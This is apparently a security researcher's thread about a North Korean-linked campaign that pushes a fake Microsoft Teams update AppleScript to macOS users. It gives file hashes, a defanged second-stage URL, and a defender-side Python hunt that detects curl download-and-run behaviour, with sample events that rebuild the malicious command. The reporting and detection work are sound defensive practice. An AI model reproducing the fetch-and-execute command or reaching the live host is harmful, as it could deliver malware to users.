North Korean hackers are pushing fake Microsoft Teams Update to macOS users
1/ North Korean hackers are pushing fake "Microsoft Teams Update" to #macOS users. We detected an ongoing campaign, which is consistent with #DPRK recruitment/crypto-targeting ops, today in France.
Filename: Microsoft Teams Update.scpt
SHA256: d4310e8286fc3e29c7dce8ed8ccffe3bbc1a38369cdeec55095d5716dd89e624
Size: 2224 bytes
Likely related to: https://x.com/malwrhunterteam/status/1992990780521124298…
2/ The loader is written in AppleScript and branded as a “Microsoft Teams Live SDK update”. To look trustworthy, it first opens a legitimate Microsoft Teams page in the background (the “What’s new” or documentation page) so a user sees something normal in their browser ...
3/ The malicious part lives here 👇
It uses the 'curl -L -k' command to download a second-stage script from: https[:]//support.ms-live[.]com/519738/check
Then it executes the downloaded content via 'run script' in AppleScript.
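A defender-side hunt for the behaviour described in 3/, added here as an example and not part of the thread: it scans constructed process-exec events for curl spawned by an AppleScript runtime with TLS verification disabled (-k) and redirect following (-L), and separately matches the defanged second-stage host given above. The event fields (parent, cmdline), the parent-process names and the helper names are assumptions.

```python
import re
import shlex

# Indicator taken from the thread, kept defanged so the literal is never dereferenced.
KNOWN_BAD_HOSTS_DEFANGED = {"support.ms-live[.]com"}
KNOWN_BAD_HOSTS = {h.replace("[.]", ".") for h in KNOWN_BAD_HOSTS_DEFANGED}
INSECURE_FLAGS = {"-k", "--insecure"}
SCRIPT_PARENTS = {"osascript", "Script Editor"}  # AppleScript runtimes (assumption)

def expand_flags(argv):
    """Normalise curl flags: '-Lk' becomes {'-L', '-k'}; long flags stay as-is."""
    flags = set()
    for a in argv:
        if a.startswith("--"):
            flags.add(a)
        elif a.startswith("-") and len(a) > 1:
            flags.update("-" + c for c in a[1:])
    return flags

def host_of(url):
    m = re.match(r"https?://([^/:]+)", url)
    return m.group(1).lower() if m else None

def analyze_event(event):
    """Return a finding for one exec event, or None when nothing suspicious combines."""
    argv = shlex.split(event.get("cmdline", ""))
    if not argv or argv[0].rsplit("/", 1)[-1] != "curl":
        return None
    flags = expand_flags(argv[1:])
    hosts = [h for h in (host_of(a) for a in argv[1:]) if h]
    reasons = []
    if event.get("parent") in SCRIPT_PARENTS:
        reasons.append("curl spawned by AppleScript runtime")
    if flags & INSECURE_FLAGS:
        reasons.append("TLS verification disabled (-k/--insecure)")
    if flags & {"-L", "--location"}:
        reasons.append("follows redirects (-L)")
    known = any(h in KNOWN_BAD_HOSTS for h in hosts)
    if known:
        reasons.append("known second-stage host from this campaign")
    # A lone -k or -L is common in admin scripts; alert on the combination or a known host.
    if len(reasons) < 2 and not known:
        return None
    return {"host": hosts[0].replace(".", "[.]") if hosts else None,
            "severity": "high" if known else "medium", "reasons": reasons}

def hunt(events):
    return [f for f in (analyze_event(e) for e in events) if f]

# Constructed sample events (not real telemetry); the first rebuilds the thread's URL at runtime.
SAMPLE_EVENTS = [
    {"parent": "osascript", "cmdline": "curl -L -k https://%s/519738/check" % next(iter(KNOWN_BAD_HOSTS))},
    {"parent": "Terminal", "cmdline": "curl -fsSL https://example.org/install.sh"},
    {"parent": "osascript", "cmdline": "curl -Lk https://stage2.example.invalid/update"},
    {"parent": "Terminal", "cmdline": "curl -k https://localhost:8443/health"},
]
```

Running hunt(SAMPLE_EVENTS) flags only the two osascript-parented downloads; the plain installer fetch and the local -k health check stay quiet.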
4/ We’ve previously seen related loaders on VirusTotal:
9135fb9e74bdb39828bfecf7919430062ce482a523999bd7ff1a368038f32371
14aba88b5f87ab9415bbca855d24abc3f151b819302930897e71e2626e823271
81c4ce82fe26e333a46e8a3d876e35b39725bda0a47f9c37ffc956d37da2d8fa